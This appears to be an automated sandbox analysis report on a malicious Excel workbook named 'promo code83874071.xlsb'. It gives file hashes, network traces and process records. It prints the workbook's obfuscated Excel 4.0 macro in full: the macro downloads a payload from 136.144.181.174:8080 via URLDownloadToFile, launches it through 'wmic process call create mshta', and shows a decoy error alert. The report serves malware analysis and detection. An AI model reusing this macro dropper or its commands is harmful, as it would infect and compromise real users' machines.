                                                    Preview: .PNG........IHDR.......8......ri.....IDATx..mP.......,....;((.J,bA.Q*..Z.tZg.Z'mRm....5...m....M2.m.j....M.%(JYQ^.0Z.%B@.a...ey....lV\W.k......=.>w..r....r.A..!..'@....{.GH.......!..<B.'x.tO......=.#.{.GH.......!..<B.'x.tO......=.#.{.GH........pc..#...I.....k..9.n..L.fk=.IX.*...i.w.t.0.~.R..m......zIO.u._p,O.....M-'?b..O+|...7...Y.tV...ik~.,S..{...n}x...9.....}9.Q.....n6.._M.. ......`........GF............go....1.w.8.....Q...N...l..9m"\... ..AiK....30%.@.....x....xfx.NR..lw..)T>a..t...Q..:....Oz.....2...e.o..y..........9.v.:.g[.=QA..O^.....+..O..?\.v5.5.V...6+.....R...-.9W.....1.&+.f..?..J*L.e.....*K._1+.....D:.3qH....T.a...._.`l..x~u....W..i...vs.w.0.yMVR..k{_b?N....W..t......~T....\.. ...sP....@U[.c+sm...S..E.c..I.Nq..M...U....R..>....h.j..}.6.i.a}.}}.]..N......5f}7.....E...7..F.e*....f6w~6. ..C]..+7..(/.h.v.._..e/..G._.5pO..........w.5.{.`......H...u.....h.......~..@.......w..kd.Ko..I.Nq..t....+`^...}'......s.Q.P.~2...B.@..tU..&..
                                                    C:\Users\user\Desktop\~$promo code83874071.xlsb
                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    File Type:data
                                                    Category:dropped
                                                    Size (bytes):165
                                                    Entropy (8bit):1.4377382811115937
                                                    Encrypted:false
                                                    SSDEEP:3:vZ/FFDJw2fV:vBFFGS
                                                    MD5:797869BB881CFBCDAC2064F92B26E46F
                                                    SHA1:61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
                                                    SHA-256:D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
                                                    SHA-512:1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
                                                    Malicious:true
                                                    Reputation:high, very likely benign file
                                                    Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                    Static File Info

                                                    General

                                                    File type:Microsoft Excel 2007+
                                                    Entropy (8bit):7.8656530304107255
                                                    TrID:
                                                    • Excel Microsoft Office Open XML Format document with Macro (51004/1) 36.56%
                                                    • Microsoft Excel Office Binary workbook document (40504/1) 29.03%
                                                    • Excel Microsoft Office Open XML Format document (40004/1) 28.67%
                                                    • ZIP compressed archive (8000/1) 5.73%
                                                    File name:promo code83874071.xlsb
                                                    File size:84285
                                                    MD5:b6c09b88eeb411e648f688e7ca6a1ca9
                                                    SHA1:da6a58fbb01118bf77842f75cb217c3cf33ded2f
                                                    SHA256:cb53bf4394e7f77534ca8bfa1039fc76c50a54be4dce411926dbb594a1a55c52
                                                    SHA512:adb123a059e116faa65717e4c7cd51479750d45457e63642b16dcc82b7b25c18ef5c43e9c54fc35ae5056b243ba1177d01453f0f985f48d6b9a031079a874f00
                                                    SSDEEP:1536:UWLP2CET+S+agP7nA9u9DE23j/iuRPk4OJ2QspRxW+gdFx:V0T1k7TA+jiq1i2QspRk+gdFx
                                                    File Content Preview:PK..........!...l.....W.......[Content_Types].xml ...(.........................................................................................................................................................................................................

                                                    File Icon

                                                    Icon Hash:e4e2ea8aa4b4b4b4

                                                    Static OLE Info

                                                    General

                                                    Document Type:OpenXML
                                                    Number of OLE Files:1

                                                    OLE File "promo code83874071.xlsb"

                                                    Indicators

                                                    Has Summary Info:
                                                    Application Name:
                                                    Encrypted Document:
                                                    Contains Word Document Stream:
                                                    Contains Workbook/Book Stream:
                                                    Contains PowerPoint Document Stream:
                                                    Contains Visio Document Stream:
                                                    Contains ObjectPool Stream:
                                                    Flash Objects Count:
                                                    Contains VBA Macros:

                                                    Macro 4.0 Code

                                                    0,564,=FOPEN("C:\Program" & CHAR(68) & "ata\Mq" & CHAR(115) & "cK" & CHAR(114) & "fE.rt" & CHAR(102), 3)
                                                    1,564,=A119+C1986
                                                    3,564,=B9697+C9656
                                                    4,564,=A1545+A1514
                                                    5,564,=A7302+A1627
                                                    6,564,=A1643+D2897
                                                    8,564,=A6796+C2237
                                                    9,564,=C2398+A2055
                                                    11,564,=A9056+C3566
                                                    13,564,=B4805+D1059
                                                    14,564,=C8951+B4440
                                                    15,564,=FOR.CELL("lHiAAPCptvMg",Sheet1!CR162:CR4998, TRUE)
                                                    16,564,=B8664+D9799
                                                    17,564,=D3541+B7263
                                                    19,564,=A248+B3581
                                                    20,564,=D1725+D9967
                                                    22,564,=C8814+A8633
                                                    23,564,=B3769+D171
                                                    25,564,=FWRITE(0,CHAR(lHiAAPCptvMg))
                                                    27,564,=B5470+C2385
                                                    28,564,=A3061+A8921
                                                    31,564,=A1799+B6964
                                                    34,564,=B4651+C1225
                                                    35,564,=C997+B3770
                                                    36,564,=NEXT()
                                                    37,564,=C3329+C561
                                                    38,564,=B1583+A5638
                                                    40,564,=D3385+B8800
                                                    41,564,=A9622+C6392
                                                    42,564,=B6167+D2582
                                                    43,564,=D8862+D8540
                                                    44,564,=D9501+B417
                                                    47,564,=D2699+D2334
                                                    50,564,=D6016+D6337
                                                    51,564,=EXEC("wmi" & CHAR(99) & " process " & CHAR(99) & "all c" & CHAR(114) & CHAR(101) & CHAR(97) & "te" & CHAR(32) & CHAR(34) & CHAR(109) & "shta " & CHAR(67) & CHAR(58) & "\ProgramData\MqscKrfE.r" & CHAR(116) & "" & CHAR(102) & CHAR(34) & "")
                                                    54,564,=C7418+C6093
                                                    55,564,=B469+C2484
                                                    57,564,=B3751+B8243
                                                    60,564,=A3749+C8271
                                                    62,564,=B5314+B4037
                                                    64,564,=CALL("urlmo" & CHAR(110) & "", "URLDownloadToFile" & CHAR(65),CHAR(74) & "" & CHAR(74) & "" & CHAR(67) & "CJJ", 0, "" & CHAR(104) & "" & CHAR(116) & CHAR(116) & CHAR(112) & CHAR(58) & "//" & CHAR(49) & CHAR(51) & "6.144.181.17" & CHAR(52) & CHAR(58) & "8080/Q2" & CHAR(87) & CHAR(53) & "VWUFL" & CHAR(53) & "VCM" & CHAR(81) & "7JQ" & CHAR(80) & "ETG3CCTYX" & CHAR(55) & "2Z4R25P" & CHAR(68) & CHAR(71), CHAR(67) & ":\P" & CHAR(114) & "ogramD" & CHAR(97) & CHAR(116) & "a\ndLVE" & CHAR(72) & CHAR(85) & "kDB" & CHAR(84) & "Bat.txt",0,0)
                                                    67,564,=C3088+A2120
                                                    68,564,=A7985+A5936
                                                    70,564,=C3892+A3029
                                                    71,564,=B4635+B8757
                                                    72,564,=D2160+B4504
                                                    74,564,=D4057+C3593
                                                    75,564,=D2836+B2913
                                                    76,564,=B6518+A6144
                                                    79,564,=ALERT("Error! Sen" & CHAR(100) & "in" & CHAR(103) & " r" & CHAR(101) & CHAR(112) & "ort " & CHAR(116) & "o Micr" & CHAR(111) & "soft...")
                                                    80,564,=B4304+B1646
                                                    81,564,=C9459+B2452
                                                    84,564,=A5157+C9373
                                                    85,564,=A2963+D365
                                                    86,564,=C6873+A9635
                                                    87,564,=B5800+D6250
                                                    89,564,=FOPEN("C:\Program" & CHAR(68) & "at" & CHAR(97) & "" & CHAR(92) & "ndLVEHUkDB" & CHAR(84) & "Bat.t" & CHAR(120) & CHAR(116),1)
                                                    92,564,=C6541+C9291
                                                    93,564,=D6295+A8642
                                                    94,564,=A432+D4240
                                                    101,564,=D5709+B4754
                                                    102,564,=C480+A3565
                                                    103,564,=SEND.MAIL(EVALUATE(FREAD(US90,255)))
                                                    105,564,=A364+B7903
                                                    107,564,=D6868+B9521
                                                    111,564,=B6091+A8910
                                                    112,564,=A5150+B630
                                                    113,564,=B3884+D3160
                                                    115,564,=RETURN()
                                                    

                                                    Network Behavior

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Nov 24, 2021 17:47:20.787206888 CET491658080192.168.2.22136.144.181.174
                                                    Nov 24, 2021 17:47:20.814785957 CET808049165136.144.181.174192.168.2.22
                                                    Nov 24, 2021 17:47:21.311948061 CET491658080192.168.2.22136.144.181.174
                                                    Nov 24, 2021 17:47:21.339871883 CET808049165136.144.181.174192.168.2.22
                                                    Nov 24, 2021 17:47:21.857947111 CET491658080192.168.2.22136.144.181.174
                                                    Nov 24, 2021 17:47:21.887046099 CET808049165136.144.181.174192.168.2.22
                                                    Nov 24, 2021 17:47:21.888463020 CET491668080192.168.2.22136.144.181.174
                                                    Nov 24, 2021 17:47:21.915960073 CET808049166136.144.181.174192.168.2.22
                                                    Nov 24, 2021 17:47:22.419699907 CET491668080192.168.2.22136.144.181.174
                                                    Nov 24, 2021 17:47:22.447290897 CET808049166136.144.181.174192.168.2.22
                                                    Nov 24, 2021 17:47:22.950062990 CET491668080192.168.2.22136.144.181.174
                                                    Nov 24, 2021 17:47:22.977873087 CET808049166136.144.181.174192.168.2.22

                                                    Code Manipulations

                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Start time:17:46:15
                                                    Start date:24/11/2021
                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                    Wow64 process (32bit):false
                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                    Imagebase:0x13f480000
                                                    File size:28253536 bytes
                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Start time:17:46:38
                                                    Start date:24/11/2021
                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:wmic process call create "mshta C:\ProgramData\MqscKrfE.rtf"
                                                    Imagebase:0xffff0000
                                                    File size:566272 bytes
                                                    MD5 hash:FD902835DEAEF4091799287736F3A028
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:moderate

                                                    General

                                                    Start time:17:46:39
                                                    Start date:24/11/2021
                                                    Path:C:\Windows\System32\mshta.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:mshta C:\ProgramData\MqscKrfE.rtf
                                                    Imagebase:0x13f7b0000
                                                    File size:13824 bytes
                                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    Disassembly

                                                    Code Analysis

                                                    Reset < >